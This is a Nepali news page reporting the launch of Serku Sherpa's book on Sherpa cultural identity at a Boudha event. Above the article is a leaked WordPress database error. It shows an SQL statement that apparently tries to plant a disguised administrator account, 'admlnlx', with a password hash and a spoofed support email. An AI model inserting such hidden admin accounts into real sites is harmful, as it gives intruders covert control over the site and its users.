WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BnciGZe1540U1rEqWtc7ZWTl6b1.QC1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 04:12:13', '', 'admlnlx', 'admlnlx')

सेर्कु शेर्पाद्वारा लिखित कृति “शेर्पा समुदायको मौलिक पहिचान” को विमोचन – Gaule Khabar

सेर्कु शेर्पाद्वारा लिखित कृति “शेर्पा समुदायको मौलिक पहिचान” को विमोचन

सेर्कु शेर्पाद्वारा लिखित कृति “शेर्पा समुदायको मौलिक पहिचान” को विमोचन

 

गाउँले न्यूज, काठमाडौ, २८ पुस । सेर्कु शेर्पाद्वारा लिखित शेर्पा “समुदायको मौलिक पहिचान” नामक पुस्तकको विमोचन शनिबार विमोचन गरिएको छ ।

सेरनिमा प्रतिष्ठान नेपालद्वारा क्लव मण्डला, बौद्धमा विशेष समारोहबीच पुस्तकको विमोचन गरिएको थियो ।

पुस्तकका लेखक शेर्पा हिमालयन शेर्पा साँस्कृतिक केन्द्रको महासचिव समेत रहेका छन् । त्रिभुवन विश्वविद्यालयका प्राध्यापक तथा साहित्यकार महेश पौड्यालको प्रमुख आतिथ्यमा सम्पन्न कार्यक्रम शेर्पा समुदायले अवलम्बन गर्दै आएको चौरी पालन पेशामा आधारित भई निर्माण गरिएको “द लस्ट नोमेड्स अफ एभेरेस्ट” नाम वृत्तचित्र समेत प्रदर्शन गरिएको थियो ।

शेर्पा समुदायमा शेर्पा भाषाको अध्यापन र अध्यन गरिरहेका शेर्पाको यो कृति अनुसन्धनात्मक पुस्तक हो । शेर्पा समुदायलाई विस्वमा चिनिएको भए तापनि शेर्पा समुदायको लिखित दस्तावेजहरु सोचे भन्दा कम भएको र यसलाई युवाहरुले विशेष ध्यान दिनु पर्ने लेखक शेर्पाले बताएका छन् । कार्यक्रममा बोल्दै लेखक शेर्पाले शेर्पा समुदायमा अध्ययन गर्न आएका विदेशीहरूलाई सहयोग गर्ने क्रममा आफू पुस्तक लेख्न प्रेरित भएको भनाइ राखेका थिए । अध्ययनको क्रममा पूर्व र पश्चिमका शेर्पा भाषामा कुनै शब्दमा भेद रहेको बताए लेखक शेर्पाले बताए । प्रायः जसो शब्दहरू उहीँ तर लवज भने फरक रहेको उनको भनाइ थियो ।
भिडियाे हेर्न यहाँ क्लिक गर्नुहास् ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका